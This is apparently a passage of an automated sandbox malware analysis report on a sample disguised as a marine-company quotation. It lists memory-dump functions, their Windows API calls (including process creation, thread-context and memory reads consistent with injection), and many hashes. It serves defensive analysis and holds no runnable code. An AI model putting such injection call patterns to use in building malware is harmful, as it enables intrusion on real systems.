                                                                            • Opcode Fuzzy Hash: c806b49d9ea008bcd8fa18921850068343770b4063e6c959f431950d6f4deb32
                                                                            • Instruction Fuzzy Hash: D3E08C32100608ABDB216FF1EC08B993B9AAB003A6F284028F90DD6561DA7499809788
                                                                            Function 006686AE Relevance: 2.6, APIs: 2, Instructions: 61COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CloseHandle.KERNELBASE(00000000,00000000,?,?,006685CC,?,006F8CC8,0000000C), ref: 00668704
                                                                            • GetLastError.KERNEL32(?,006685CC,?,006F8CC8,0000000C), ref: 0066870E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: CloseErrorHandleLast
                                                                            • String ID:
                                                                            • API String ID: 918212764-0
                                                                            • Opcode ID: 8e78ad5dc860583b52762d579398bb5461c322530621399c0397a4c4a55046e3
                                                                            • Instruction ID: c75b2de8eabc29825ec33aeedce3093e92521bd8ebb63bd8280be9222ddf88c6
                                                                            • Opcode Fuzzy Hash: 8e78ad5dc860583b52762d579398bb5461c322530621399c0397a4c4a55046e3
                                                                            • Instruction Fuzzy Hash: 88012B326056601ED6746334E846BBE6B4B4B91B78F39031DF919DB3D3EEA08C818194
                                                                            Function 0106ADCD Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 0106B58B
                                                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0106B621
                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0106B643
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11157727696.0000000001069000.00000040.00000020.00020000.00000000.sdmp, Offset: 01069000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1069000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                            • String ID:
                                                                            • API String ID: 2438371351-0
                                                                            • Opcode ID: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                                                            • Instruction ID: ee84fc41c12723dcab3c93a5f53ad95315ee4886d1b0152d854a5f5389f6e6a9
                                                                            • Opcode Fuzzy Hash: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                                                            • Instruction Fuzzy Hash: 3C12EE20E24658C6EB24DF64D8507DEB272EF68300F1090E9914DEB7A5E77A4F81CF5A
                                                                            Function 006B709C Relevance: 1.8, APIs: 1, Instructions: 326COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: LoadString
                                                                            • String ID:
                                                                            • API String ID: 2948472770-0
                                                                            • Opcode ID: 391d4d850c212deb352fc6efaa64d44d798edb483e0830ba5996cf686e2490d6
                                                                            • Instruction ID: b73b517db3885e3cbcf297c00810e494932474e357f8398021c8b52b96c0a440
                                                                            • Opcode Fuzzy Hash: 391d4d850c212deb352fc6efaa64d44d798edb483e0830ba5996cf686e2490d6
                                                                            • Instruction Fuzzy Hash: E1D14C75A04209EFCB14EF98C8819EDBBB6FF88314F144059E915AB391DB31AD82CF94
                                                                            Function 0064FC70 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: ProtectVirtual
                                                                            • String ID:
                                                                            • API String ID: 544645111-0
                                                                            • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                            • Instruction ID: 672969ec3a687ca3abdd1efc11db9277830079fc1d939cf4a14b0ac99719df3c
                                                                            • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                            • Instruction Fuzzy Hash: 3831B275A00109DBD718DF59D4C0AAAFBA6FF49300B6486A5E80ACB756D731EDC1CBD0
                                                                            Function 00634ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00634E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00634EDD,?,00701418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00634E9C
                                                                              • Part of subcall function 00634E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00634EAE
                                                                              • Part of subcall function 00634E90: FreeLibrary.KERNEL32(00000000,?,?,00634EDD,?,00701418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00634EC0
                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00701418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00634EFD
                                                                              • Part of subcall function 00634E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00673CDE,?,00701418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00634E62
                                                                              • Part of subcall function 00634E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00634E74
                                                                              • Part of subcall function 00634E59: FreeLibrary.KERNEL32(00000000,?,?,00673CDE,?,00701418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00634E87
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Library$Load$AddressFreeProc
                                                                            • String ID:
                                                                            • API String ID: 2632591731-0
                                                                            • Opcode ID: 74d58ad5def6377864f6ab81d024086810a607b912584bd60183f8c8b72477f0
                                                                            • Instruction ID: 07885ad875f8ea6c35939e434625c704427fc8f22e00941300ac7bfee9cd0d73
                                                                            • Opcode Fuzzy Hash: 74d58ad5def6377864f6ab81d024086810a607b912584bd60183f8c8b72477f0
                                                                            • Instruction Fuzzy Hash: EF11E332600305AACF54BB64DC12FADB7A7AF80711F14842DF546A62C1EE75AE059B98
                                                                            Function 00663820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RtlAllocateHeap.NTDLL(00000000,?,00701444,?,0064FDF5,?,?,0063A976,00000010,00701440,006313FC,?,006313C6,?,00631129), ref: 00663852
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: AllocateHeap
                                                                            • String ID:
                                                                            • API String ID: 1279760036-0
                                                                            • Opcode ID: a7de8bf769eba6f03fac91513633cbe8d3cd27ba85e67693320586ba11711634
                                                                            • Instruction ID: 5d33e22edd8069155fd6e7d9e43bbd6cf5fd2c0be15ff3482d3b0901fe752c9a
                                                                            • Opcode Fuzzy Hash: a7de8bf769eba6f03fac91513633cbe8d3cd27ba85e67693320586ba11711634
                                                                            • Instruction Fuzzy Hash: E9E0ED31100234AAE7612AA79C05BDA374BAF827B1F09012CBC0693B81CF20DE0283E4
                                                                            Function 00634F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FreeLibrary.KERNEL32(?,?,00701418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00634F6D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: FreeLibrary
                                                                            • String ID:
                                                                            • API String ID: 3664257935-0
                                                                            • Opcode ID: 3703f1ae5f6e49c71fe0e8297434dbdb388eb8eb90bd211fe0c88b8495f65d58
                                                                            • Instruction ID: 0a55e132218f5282f75617118b421fbd5873341bdc32a9daf9fc8a56b067ca27
                                                                            • Opcode Fuzzy Hash: 3703f1ae5f6e49c71fe0e8297434dbdb388eb8eb90bd211fe0c88b8495f65d58
                                                                            • Instruction Fuzzy Hash: 7BF03071105751CFDB349F65D490862F7E6EF54329718C9BEE1DA82611CB31A844DF90
                                                                            Function 0069CCFF Relevance: 1.5, APIs: 1, Instructions: 26fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,?,0067EE51,006F3630,00000002), ref: 0069CD26
                                                                              • Part of subcall function 0069CC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,00000000,?,00000000,?,?,?,0069CD19,?,?,?), ref: 0069CC59
                                                                              • Part of subcall function 0069CC37: SetFilePointerEx.KERNEL32(?,?,00000000,00000000,00000001,?,0069CD19,?,?,?,?,0067EE51,006F3630,00000002), ref: 0069CC6E
                                                                              • Part of subcall function 0069CC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,0069CD19,?,?,?,?,0067EE51,006F3630,00000002), ref: 0069CC7A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: File$Pointer$Write
                                                                            • String ID:
                                                                            • API String ID: 3847668363-0
                                                                            • Opcode ID: fc1b990bfdde6419c69d446310a8e85c055bfcbd4ae1e878c295bd691e9e5a33
                                                                            • Instruction ID: 6e52dcae353d40c69c977be08f46e5911003874fdd9113f54c0afa7344133666
                                                                            • Opcode Fuzzy Hash: fc1b990bfdde6419c69d446310a8e85c055bfcbd4ae1e878c295bd691e9e5a33
                                                                            • Instruction Fuzzy Hash: 15E06576400704EFCB219F4ADD00CAABBFDFF84360710852FE955C2910D371AA14DB60
                                                                            Function 00632DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00632DC4
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: LongNamePath
                                                                            • String ID:
                                                                            • API String ID: 82841172-0
                                                                            • Opcode ID: 5134d7601c125d75dee388157e7dfb78d6ce37d1b160d306248b2f5c077167be
                                                                            • Instruction ID: bdf6bfa63726ae353a01293c6dc5d2e50c97d95172bf140f51b2ae63a1eacefb
                                                                            • Opcode Fuzzy Hash: 5134d7601c125d75dee388157e7dfb78d6ce37d1b160d306248b2f5c077167be
                                                                            • Instruction Fuzzy Hash: 6CE0CD72A001245BC7109258DC05FEA77DEDFC8790F044075FD0DD7248D964AD808694
                                                                            Function 00632B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00633837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00633908
                                                                              • Part of subcall function 0063D730: GetInputState.USER32 ref: 0063D807
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00632B6B
                                                                              • Part of subcall function 006330F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 0063314E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                                                            • String ID:
                                                                            • API String ID: 3667716007-0
                                                                            • Opcode ID: 0564c00b6b494fa88c5e795d29789a2ddab5252f03da0de28647c274bf6b9bb2
                                                                            • Instruction ID: fe2db42188e3c155be836cabf2a1c84310421a526b1e133c10cccb072e18d050
                                                                            • Opcode Fuzzy Hash: 0564c00b6b494fa88c5e795d29789a2ddab5252f03da0de28647c274bf6b9bb2
                                                                            • Instruction Fuzzy Hash: 50E0863170429446C648BB74A8525BDA79B9BD1365F40153EF146832A2CF74454546D9
                                                                            Function 0067039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateFileW.KERNELBASE(00000000,00000000,?,00670704,?,?,00000000,?,00670704,00000000,0000000C), ref: 006703B7
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            • Opcode ID: 33866262bc672dfa310bee892d28001b858bcbb4f6b87a348bb8583b732bad6e
                                                                            • Instruction ID: 07a0b729b453fb791db1a86f87c45eb1cbcea6c5544fb65474823a04f3fa68de
                                                                            • Opcode Fuzzy Hash: 33866262bc672dfa310bee892d28001b858bcbb4f6b87a348bb8583b732bad6e
                                                                            • Instruction Fuzzy Hash: A5D06C3204010DBBDF028F85DD06EDA3BAAFB48714F014000FE1856420C732E821AB90
                                                                            Function 00631CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00631CBC
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: InfoParametersSystem
                                                                            • String ID:
                                                                            • API String ID: 3098949447-0
                                                                            • Opcode ID: c4b102852f75146361b4824d967f8bee8094767c2378712f54627b8063510119
                                                                            • Instruction ID: 62f44e519609e124ccb26ee019ccf45dfb688e41e1c48308516c3d4877edc851
                                                                            • Opcode Fuzzy Hash: c4b102852f75146361b4824d967f8bee8094767c2378712f54627b8063510119
                                                                            • Instruction Fuzzy Hash: B5C09236280304EFF3148B80BC5EF20BB65A348B10F94D101F60DA95E3CBA62832EA58
                                                                            Function 006A744A Relevance: 1.5, APIs: 1, Instructions: 220COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00635745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0063949C,?,00008000), ref: 00635773
                                                                            • GetLastError.KERNEL32(00000002,00000000), ref: 006A76DE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: CreateErrorFileLast
                                                                            • String ID:
                                                                            • API String ID: 1214770103-0
                                                                            • Opcode ID: 0c488166a7bd6e178565efb92d29efa36f3040bb617c811fb27e5c510748d857
                                                                            • Instruction ID: c72d6a8afb14509fce5df40810b5564345c9628b6eac6e578bc7d2a61cb1afca
                                                                            • Opcode Fuzzy Hash: 0c488166a7bd6e178565efb92d29efa36f3040bb617c811fb27e5c510748d857
                                                                            • Instruction Fuzzy Hash: 198171306087019FCB55EF28C891BA9B7E2AF89310F04455DF8865B3A2DB70ED45CF96
                                                                            Function 0106BDCC Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • Sleep.KERNELBASE(000001F4), ref: 0106BDE1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11157727696.0000000001069000.00000040.00000020.00020000.00000000.sdmp, Offset: 01069000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1069000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Sleep
                                                                            • String ID:
                                                                            • API String ID: 3472027048-0
                                                                            • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                            • Instruction ID: 924dc0dfe913964c8077a7f26f8246a7b02f3bcbbda02f5dab158e723dca07cf
                                                                            • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                            • Instruction Fuzzy Hash: 9BE0BF7494410EEFDB00EFA4D5496EE7BB4EF04301F1005A1FD05D7681DB309E648A62
                                                                            Function 00636246 Relevance: 1.3, APIs: 1, Instructions: 19COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CloseHandle.KERNELBASE(?,?,00000000,006724E0), ref: 00636266
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: CloseHandle
                                                                            • String ID:
                                                                            • API String ID: 2962429428-0
                                                                            • Opcode ID: 92960ebbe339090ce7949f72a9c3b4e500f503d86e1498f502f503a44a174eb6
                                                                            • Instruction ID: 239624322789354b91d472a73592db77bab6069e5a62cffa728651e45da9d48e
                                                                            • Opcode Fuzzy Hash: 92960ebbe339090ce7949f72a9c3b4e500f503d86e1498f502f503a44a174eb6
                                                                            • Instruction Fuzzy Hash: E2E0B675400B01DFC3314F1AE804452FBF6FFE13613218A2EE1E992664D3B059868F90
                                                                            Function 0106BDD0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • Sleep.KERNELBASE(000001F4), ref: 0106BDE1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11157727696.0000000001069000.00000040.00000020.00020000.00000000.sdmp, Offset: 01069000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1069000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Sleep
                                                                            • String ID:
                                                                            • API String ID: 3472027048-0
                                                                            • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                            • Instruction ID: f0ebe686c693700f92318de75cab8b4a9d833fbebca09614ea80f9c5f45df4fe
                                                                            • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                            • Instruction Fuzzy Hash: 2CE0E67494410EDFDB00EFB4D5496EE7FB4EF04301F100161FD01D2281DA309D608A62

                                                                            Non-executed Functions

                                                                            Function 006C9576 Relevance: 74.1, APIs: 39, Strings: 3, Instructions: 625windowkeyboardCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00649BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00649BB2
                                                                            • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 006C961A
                                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 006C965B
                                                                            • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 006C969F
                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 006C96C9
                                                                            • SendMessageW.USER32 ref: 006C96F2
                                                                            • GetKeyState.USER32(00000011), ref: 006C978B
                                                                            • GetKeyState.USER32(00000009), ref: 006C9798
                                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 006C97AE
                                                                            • GetKeyState.USER32(00000010), ref: 006C97B8
                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 006C97E9
                                                                            • SendMessageW.USER32 ref: 006C9810
                                                                            • SendMessageW.USER32(?,00001030,?,006C7E95), ref: 006C9918
                                                                            • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 006C992E
                                                                            • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 006C9941
                                                                            • SetCapture.USER32(?), ref: 006C994A
                                                                            • ClientToScreen.USER32(?,?), ref: 006C99AF
                                                                            • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 006C99BC
                                                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 006C99D6
                                                                            • ReleaseCapture.USER32 ref: 006C99E1
                                                                            • GetCursorPos.USER32(?), ref: 006C9A19
                                                                            • ScreenToClient.USER32(?,?), ref: 006C9A26
                                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 006C9A80
